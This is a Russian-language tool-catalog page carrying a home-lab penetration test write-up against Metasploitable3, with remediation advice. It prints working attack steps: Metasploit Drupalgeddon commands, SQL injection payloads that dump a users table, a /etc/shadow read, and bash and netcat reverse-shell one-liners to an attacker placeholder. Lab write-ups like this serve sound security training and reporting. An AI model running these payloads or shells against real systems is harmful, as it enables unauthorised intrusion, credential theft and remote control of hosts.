Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
metasploitable3-pentest-writeup — Отчёт о пентесте домашней лаборатории Metasploitable3, охватывающий разведку с помощью Nmap, RCE через Drupalgeddon, SQL-инъекцию, повторное использование учётных данных SSH, повышение привилегий через sudo и обратные оболочки. | Kitploit
Инструменты/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Повышение привилегийРазведкаАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияCTFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Обучение и Образование
Лаборатории и Практика
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Отчёт о пентесте домашней лаборатории Metasploitable3, охватывающий разведку с помощью Nmap, RCE через Drupalgeddon, SQL-инъекцию, повторное использование учётных данных SSH, повышение привилегий через sudo и обратные оболочки.

Репозиторий
119 ч 15 мин назадЕщё не проверено

Metasploitable3 — Отчёт о тестировании на проникновение

Автор: Arlen Fortunato
Дата: Сентябрь 2026
Среда: Parrot OS (атакующий) → Metasploitable3 Ubuntu 14.04 (цель)
Область: Полное тестирование сети на проникновение — разведка, эксплуатация, повышение привилегий, постэксплуатация
Тип: Домашняя лаборатория / Практика Capture The Flag

⚠️ Все учётные данные ниже отредактированы. Это было легальное, изолированное упражнение в домашней лаборатории.


Использованные инструменты

ИнструментРоль
NmapСканирование портов, определение служб/версий, фингерпринтинг ОС
Metasploit (msfconsole)Эксплуатация (CVE-2014-3704), управление сессиями
msfvenomГенерация полезных нагрузок (bash/netcat reverse shells)
nc (netcat)Слушатель обратных оболочек
curl / sedРучное создание SQLi + форматирование HTML-вывода
ssh / scpУдалённый доступ, проверка учётных данных
openssl s_clientПроверка служб TLS/SSL
gobusterБрутфорс директорий (веб-разведка)

Разведка — полное сканирование портов Nmap

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

ОС: Linux Ubuntu 14.04, ядро 3.13.0-24-generic x86_64


Сводка находок


Детали находок

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — ложное срабатывание

Уязвимость: UnrealIRCd 3.2.8.1 исторически распространялся с троянизированным бинарником, который выполняет произвольные команды, когда неаутентифицированный клиент отправляет триггерную строку до регистрации — RCE от имени пользователя IRC-демона.

Попытка эксплуатации: модуль Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor с полезными нагрузками cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. Автопроверка модуля сообщила об уязвимости службы; ни одна сессия не была получена ни с одной полезной нагрузкой.

Выполненные действия по устранению неполадок:

  • Порт доступен (nc -vz)
  • Порт подтверждён как plaintext IRC, а не TLS (openssl s_client)
  • Ручное обратное подключение с цели подтвердило работоспособность исходящей сети
  • Ручной триггер бэкдора через nc вернул ошибку протокола IRC 451 — команда была разобрана как IRC-команда, но не выполнена

Вывод: баннер версии указывает на уязвимую сборку, но бэкдор в данном экземпляре отсутствует (чистый/перекомпилированный бинарник). Классифицировано как неэксплуатируемое — ложное срабатывание, с доказательствами.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Уязвимость: Drupal 7.x до 7.32 содержит критическую SQL-инъекцию в слое абстракции базы данных, позволяющую неаутентифицированное удалённое выполнение кода.

Подтверждение версии: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Эксплуатация:

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Результат:

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Разведка после эксплуатации:

  • /var/www/html: chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home: 16 учётных записей пользователей

3. Приложение расчёта зарплат — UNION-based SQL-инъекция (вручную)

Уязвимость: форма входа payroll_app.php, SQL-инъекция в поле пароля. Автоматизация не использовалась — создано вручную через curl.

Шаг 1 — Обход аутентификации:

root@kitploit:~
' or 1=1#

' закрывает SQL-строку, or 1=1 делает условие истинным, # закомментирует оставшуюся кавычку.

Шаг 2 — Подсчёт столбцов + сопоставление вывода:

root@kitploit:~
' UNION SELECT null, null, null, null#     -- нет ошибки = 4 столбца
' UNION SELECT 1, 2, 3, 4#                 -- маркеры: 1=Username, 2=First, 3=Last, 4=Salary

Шаг 3 — Перечисление information_schema:

ВопросОтвет
Версия БД / пользовательMySQL 5.5.62, root@localhost

Шаг 4 — Дамп (пароли отредактированы):

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — учётные данные по умолчанию и повторное использование

Путь 1 — Учётная запись по умолчанию: стандартная пара учётных данных vagrant аутентифицировалась по SSH → пользователь в группе sudo с (ALL : ALL) NOPASSWD: ALL.

Путь 2 — Повторное использование учётных данных: учётные данные, полученные из дампа SQLi, аутентифицировались напрямую по SSH как другой лабораторный пользователь (luke_skywalker, группа sudo, (ALL : ALL) ALL).

Значимость: демонстрирует повторное использование учётных данных между службами — учётные данные приложения сопоставлены с системной учётной записью.


5. Повышение привилегий (два пути)

  • Путь A: vagrant → sudo -l показывает NOPASSWD: ALL → sudo su - → uid=0(root).
  • Путь B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

Локальный эксплойт не потребовался — обе учётные записи имеют чрезмерно разрешительные права sudo.


6. Дамп shadow

root@kitploit:~
sudo cat /etc/shadow

Извлечено 16 хешей md5crypt ($1$) — полный сбор учётных данных после повышения привилегий.


7. Постэксплуатация — обратные оболочки

Полезная нагрузка 1 — bash:

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Перехвачено на nc -lnvp 4444 → интерактивная оболочка.

Полезная нагрузка 2 — netcat (именованный канал):

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Перехвачено на nc -lnvp 4445 → интерактивная оболочка.

Механизм: именованный канал (FIFO) соединяет stdin/stdout netcat с /bin/sh, образуя двунаправленный туннель через один сокет; FIFO удаляется после завершения.


Рекомендации по устранению


Отказ от ответственности

Все тестирования выполнялись исключительно в изолированной домашней лаборатории с использованием намеренно уязвимого программного обеспечения (Rapid7 Metasploitable3). Никакие производственные системы или несанкционированные цели не затрагивались. Этот отчёт предназначен только для образовательных целей и личного развития навыков.

Скачать инструмент
ПортСостояниеСлужбаВерсия
21/tcpopenFTPProFTPD 1.3.5
22/tcpopenSSHOpenSSH 6.6.1p1
80/tcpopenHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpopenSMBSamba smbd 3.X–4.X
631/tcpopenIPPCUPS 1.7
3306/tcpopenMySQLMySQL (unauthorized)
3500/tcpopenHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpopenIRCUnrealIRCd
8080/tcpopenHTTPJetty 8.1.7.v20120910
#УязвимостьCVE / ТипПортКритичностьРезультат
1Фингерпринт версии UnrealIRCd — проверка бэкдораCVE-2010-20756697⚠️ Ложное срабатываниеАвтопроверка модуля пройдена, ручная проверка не удалась — бэкдор отсутствует в сборке
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 КритическаяОболочка Meterpreter от имени www-data
3Приложение расчёта зарплат — UNION SQLi (вручную)Ручная инъекция80🔴 КритическаяПолный дамп БД (15 пользователей, пароли в открытом виде — отредактированы)
4SSH — учётные данные по умолчанию + повторное использованиеПо умолчанию / повторное использование22🔴 Критическаяvagrant (NOPASSWD sudo), luke_skywalker (sudo ALL)
5Повышение привилегий (два пути)Неправильно настроенный sudoН/Д🔴 Критическаяroot через обе учётные записи
6Дамп shadowПостэксплуатацияН/Д🔴 КритическаяИзвлечено 16 хешей md5crypt
7Обратные оболочки (bash + netcat)msfvenom / ручное создание4444/4445🟠 ВысокаяИнтерактивные оболочки перехвачены на слушателе атакующего
Базы данныхinformation_schema, drupal, mysql, payroll, performance_schema
Таблицы в payrollusers
Столбцы в usersusername, first_name, last_name, password, salary
Имя пользователяПарольЗарплата
leia_organa[REDACTED]9560
luke_skywalker[REDACTED]1080
han_solo[REDACTED]1200
artoo_detoo[REDACTED]22222
boba_fett[REDACTED]20000
greedo[REDACTED]50000
(+ ещё 9 учётных записей)[REDACTED]—
НаходкаРекомендация
Фингерпринт версии UnrealIRCdПроверить целостность источника бинарника (контрольные суммы); обновить или удалить
Drupal 7.5Обновить до последней стабильной версии; применить SA-CORE-2014-005
SQLi в приложении расчёта зарплатПараметризованные запросы / подготовленные выражения; проверка входных данных
Учётные данные SSH по умолчаниюСменить/удалить учётные записи по умолчанию; включить аутентификацию по ключам
Избыточные права sudoПрименить принцип наименьших привилегий; удалить массовые разрешения NOPASSWD
Повторное использование учётных данныхОбеспечить уникальные пароли для каждой службы; политика паролей
Слабое хеширование паролейМигрировать с md5crypt → bcrypt / Argon2id